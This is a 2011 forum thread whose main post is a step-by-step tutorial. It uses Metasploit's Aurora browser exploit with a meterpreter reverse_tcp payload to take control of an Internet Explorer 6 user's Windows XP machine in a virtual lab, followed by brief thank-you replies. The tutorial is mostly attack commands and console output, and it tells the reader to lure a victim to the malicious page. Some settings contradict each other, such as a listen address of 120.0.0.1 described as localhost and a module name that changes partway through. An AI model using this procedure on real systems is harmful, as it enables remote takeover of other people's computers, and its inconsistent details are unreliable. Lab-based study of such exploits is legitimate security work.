Go4Expert

Go4Expert (http://www.go4expert.com/)
-   Ethical hacking Tips (http://www.go4expert.com/articles/ethical-hacking-tutorials/)
-   -   Client Side Exploitation Using Metasploit (http://www.go4expert.com/articles/client-exploitation-using-metasploit-t26428/)

lionaneesh 2Aug2011 20:39

Client Side Exploitation Using Metasploit
 
In this tutorial we’ll be learning how to perform a basic client side exploitation using Metasploit. Note this tutorial is made for educational purposes only to help you understand how the exploit's can be exploited.

Client Side Attacks



Client side attacks are special types of attacks that mainly target Client Side Applications, eg : Web Browser , Download Client etc. These are Different from Server Side Applications as instead of targeting vulnerabilities in Server Side applications like : Web Server etc. It actually targets the client side application.

For demonstrating this attack we’ll be using the Metasploit Framework and Using one of its basic Client Side Exploit.

Lab Setup



The Lab Consists of a Victim and an Attacker Machine.

Code:

+++++++++++++++++++                  +++++++++++++++++++++
+ Attacker        +  ================ + Victim Machine    +
+                +    Behind NAT    +                  +
+++++++++++++++++++                  +++++++++++++++++++++

Victim

The Victim Machine is running an Unlatched Windows XP SP1 machine; With Internet Explorer 6 Which is vulnerable to a Client Side Vulnerability.

Attacker

The Attacker’s Machine is running Backtrack 5 with Metasploit Installed.

I am using Virtual Machines to Setup my Lab, and the Network Type is set to NAT.

Now that we have setup our lab let the hacking begin.

Exploitation



First lets open up Metasploit Console , using ‘msfconsole’ :-

Code:

  root@bt:~# msfconsole
 
                  __.                      .__.        .__. __.
    _____  _____/  |______    ____________ |  |  ____ |__|/  |_
  /    \_/ __ \  __\__  \  /  ___/\____ \|  |  /  _ \|  \  __\
  |  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
  |__|_|  /\___  >__| (____  /____  >|  __/|____/\____/|__||__|
        \/    \/          \/    \/ |__|
 
 
        =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
  + -- --=[ 688 exploits - 357 auxiliary - 39 post
  + -- --=[ 217 payloads - 27 encoders - 8 nops
  msf >

Though Metasploit provides hundreds of exploits to exploit Internet Explorer 6, for this tutorial we’ll be using the Internet Explorer Aurora Exploit.

To use this exploit in Metasploit simple use the ‘use’ command:-

Code:

  msf > use exploit/windows/browser/ms10_002_aurora
 
  msf exploit(ms10_002_aurora) >

Now let’s have a look at the options:-
Code:

  msf exploit(ms10_002_aurora) > show options
 
  Module options (exploit/windows/browser/ms10_002_aurora):
 
    Name        Current Setting  Required  Description
    ----        ---------------  --------  -----------
    SRVHOST    0.0.0.0          yes      The local host to listen on. This must be an address on the local machine or 0.0.0.0
    SRVPORT    8080            yes      The local port to listen on.
    SSL        false            no        Negotiate SSL for incoming connections
    SSLVersion  SSL3            no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
    URIPATH                      no        The URI to use for this exploit (default is random)
 
 
  Exploit target:
 
    Id  Name
    --  ----
    0  Automatic

Now let’s set them!
Code:

  msf exploit(ms10_002_aurora) > set SRVHOST 127.0.0.1
  SRVHOST => 127.0.0.1
  msf exploit(ms10_002_aurora) > set SRVPORT 80
  SRVPORT => 80
  msf exploit(ms10_002_aurora) > set URIPATH /
  URIPATH => /
  msf exploit(ms10_002_aurora) >

Above we set the Server to localhost i.e 127.0.0.1 , Server port to 80 and the URI path to ‘/’ (ROOT).

Now let’s Set some Payload Options:-
Code:

  msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
  PAYLOAD => windows/meterpreter/reverse_tcp
  msf exploit(ms10_002_aurora) > show options
 
  Module options (exploit/windows/browser/ms10_002_aurora):
 
    Name        Current Setting  Required  Description
    ----        ---------------  --------  -----------
    SRVHOST    127.0.0.1        yes      The local host to listen on. This must be an address on the local machine or 0.0.0.0
    SRVPORT    80              yes      The local port to listen on.
    SSL        false            no        Negotiate SSL for incoming connections
    SSLVersion  SSL3            no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
    URIPATH    /                no        The URI to use for this exploit (default is random)
 
 
  Payload options (windows/meterpreter/reverse_tcp):
 
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes      Exit technique: seh, thread, process, none
    LHOST                      yes      The listen address
    LPORT    4444            yes      The listen port
 
 
  Exploit target:
 
    Id  Name
    --  ----
    0  Automatic
 
 
  msf exploit(ms10_002_aurora) > set LHOST 120.0.0.1
  LHOST => 120.0.0.1
  msf exploit(ms10_002_aurora) > set LPORT 31337
  LPORT => 31337
  msf exploit(ms10_002_aurora) >

Above we set the Payload to reverse_tcp , the listening server to localhost and the listening Port to 31337.

Now that all is setup, let’s launch the exploit:-
Code:

 
  msf exploit(ms10_002_aurora) > exploit
 
Exploit running as background job.
Started reverse handler on 127.0.0.1:31337
Using URL: http://127.0.0.1:80/
Server started.

The malicious web page is sitting on our server (URL: http://127.0.0.1:80/) , Now all you have to do is direct victim to this webpage and if they are running an exploitable version on Windows XP they’ll get owned!

In this case I’ll use vulnerable IE browser on the Victim Machine to view this site , Now see what happens:-

Code:

Sending stage (723456 bytes)

Meterpreter session 1 opened (192.168.0.1:31337 -> 192.168.0.2:1514)

msf exploit(ie_aurora) > sessions -i 1

Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\VICTIM

We got a meterpreter session. Now you can use this to execute any command on the system. Thus the victim machine got owned.

That’s all for this tutorial stay tuned for more.

anilkamble 3Aug2011 17:15

Re: Client Side Exploitation Using Metasploit
 
Thanks for sharing this nice info with us .
hoping more from u.

lionaneesh 4Aug2011 10:33

Re: Client Side Exploitation Using Metasploit
 
Quote:

Originally Posted by anilkamble (Post 85690)
Thanks for sharing this nice info with us .
hoping more from u.

My Pleasure! :D

ManzZup 5Aug2011 23:14

Re: Client Side Exploitation Using Metasploit
 
really nice one
thankx for the share :D

lionaneesh 11Sep2011 19:18

Re: Client Side Exploitation Using Metasploit
 
Quote:

Originally Posted by ManzZup (Post 85776)
really nice one
thankx for the share :D

My Pleasure!


All times are GMT +5.5. The time now is 21:38.